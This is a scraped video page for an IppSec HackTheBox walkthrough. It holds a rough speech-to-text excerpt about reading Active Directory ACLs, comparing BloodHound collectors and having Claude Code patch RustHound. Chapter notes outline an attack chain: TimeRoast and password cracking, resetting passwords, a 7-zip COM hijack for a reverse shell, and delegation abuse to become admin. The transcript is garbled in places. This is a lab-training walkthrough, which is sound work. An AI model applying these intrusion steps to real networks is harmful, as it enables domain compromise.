So, I'm just going to make dirt for attempt directory. Let's unzip uh this file uh 7z. There we go. And then we're going to cat uh where is the groups? Right here. jq. Go to protected objects. And right off the bat, oh this is Oh, here we go. Add member principal SID right here. So this is showing the ad member here. If I look at the SID, that is going to be the SID of help desk, I believe. um right here. Yeah, object identifier name is help desk. So, the Python ingesttor collected it, but for some reason Rusttown didn't, and we're going to find out exactly why. Um, but before I do that, let's just show one last thing. Um, I always like knowing how to do things manually. So, let's uh get back on the box. Um, we're going to get a shell as BB Morgan. I'm gonna do get ad group um protected object, right? Is it object or objects? There we go. Because I wanted to get the gooid. Um is the good? No, I want to get the full distinguished name. This is what I wanted. And then we can do a get ACL on the AD drive. If you don't run a like AD command to automatically import the active directory module, this is going to fail because you don't have this AD path. But if you run get ACL and do AD colon, it fails. Just try to do a get ad user or import the active directory module. Um, we'll do this. Specify the DN. And this should get the ACL. Yep. So, let's go like this and then do access. Um, I really should probably just switch to like devious winrm or something. That really annoys me when it fails, but I can show if I just paste this, the command's going to fail because we don't have the drive with AD. Get AD user. Let's just do administrator. Doesn't really matter who we do, but that imports the module, gives us the AD drive, and bada bing. So let's search for what was it? Help desk. There we go. We see right property and we don't see add member but we have this object type. And if we look at what this object type is, I'm just going to Google this. Go here search. We can see this gooid matches over to member. Right? So that's how we have the right property over member. And that's why it's showing add member as the um blood hound edge. So now I want to go over to Rusttown again. Um in Rusttown code actually um it has all the gooids. I think if I just search this um curse the demo gods. I guess it's not called that. Uh is it probably like what is it? Um force oh because I'm not logged in and that's why I'm not seeing it. Let's just clone this. Um, get clone paste cd rust hound. That change to GitHub always throws me off. Um, what is this? Did that go to my clipboard? It did. Script-R for this thing. And we can see in the um constants that is right member this um thing. But this isn't where the magic happens. Um, the magic's actually going to happen with claude code. Uh, so if I just type claude here, I've already got claude code installed and I logged into my account. We just have this. Um, I'm going to ask it a question. I'm just going to say, let's say this is not grabbing the right property. Add member ACL on an active directory group. I'm going to hope it does it similar to how it did when I was just playing with this um off recording. It's going to take a while to run. I think it took me like 5 to 10 minutes, but it actually fixed the code and all I had to do was say yes. Um it's real
Original Description
00:00 - Introduction
01:00 - Start of nmap
05:00 - Syncing our time with the DC via NTPDate
10:12 - Writing a custom Cypher Query in Bloodhound to show everything that users and computers can directly do, except for group memberships. Discover an oddity around IT-COMPUTER3 and seeing its password set date is also odd
14:00 - Using NetExec to perform a TimeRoast attack and then cracking the computer password
18:15 - Back in Bloodhound, we can see IT-Computer3 has a path to take over several users
22:45 - Using BloodyAD to add ourself to the helpdesk group and then reset BB.MORGAN's password
25:00 - Still cannot log in, discovering BB.MORGAN is a member of the Protected Users/Objects group. Trying to use AES instead of RC4 with impacket, still have issue. Assume the domain doesn't support it, this feels weird.
29:30 - Using BloodyAD to remove the user from the Protected Objects group, the logging in with BB.MORGAN
35:30 - Find a PDF and it talks about Context Menus and COM Objects with Zip programs
39:10 - Using Req Query to show CLSID's then identifying support can modify the one that points to 7-zip's dll
44:00 - Using RunAsCS to switch to the support user (ee.reed) as remote logins appeared to be disabled for them
46:00 - Performing the COM Hijack on 7-zip and getting a reverse shell as mm.turner.
49:55 - Shell returned as mm.turner, who has the AllowedToAct on the DC
53:30 - Using Set-ADComputer to set the delegation permission, then getST to impersonate BackupAdmin get admin
01:05:05 - Showing why EE.REED could not login, diving into looking at the secpol command to dump security policies
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: AI Security
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
Cyber Hygiene: The Everyday Habits That Protect Your Digital Life
Medium · Cybersecurity
I found 10 bugs in my own security scanner. Here's what they taught me about false positives.
Dev.to · Zein Saleh
Sudden SSL Error for github pages custom domain website
Reddit r/webdev
Reverse-proof protector
Medium · Cybersecurity
Chapters (16)
Introduction
1:00
Start of nmap
5:00
Syncing our time with the DC via NTPDate
10:12
Writing a custom Cypher Query in Bloodhound to show everything that users and
14:00
Using NetExec to perform a TimeRoast attack and then cracking the computer pas
18:15
Back in Bloodhound, we can see IT-Computer3 has a path to take over several us
22:45
Using BloodyAD to add ourself to the helpdesk group and then reset BB.MORGAN's
25:00
Still cannot log in, discovering BB.MORGAN is a member of the Protected Users/
29:30
Using BloodyAD to remove the user from the Protected Objects group, the loggin
35:30
Find a PDF and it talks about Context Menus and COM Objects with Zip programs
39:10
Using Req Query to show CLSID's then identifying support can modify the one th
44:00
Using RunAsCS to switch to the support user (ee.reed) as remote logins appeare
46:00
Performing the COM Hijack on 7-zip and getting a reverse shell as mm.turner.
49:55
Shell returned as mm.turner, who has the AllowedToAct on the DC
53:30
Using Set-ADComputer to set the delegation permission, then getST to impersona
1:05:05
Showing why EE.REED could not login, diving into looking at the secpol command
🎓
Tutor Explanation
DeepCamp AI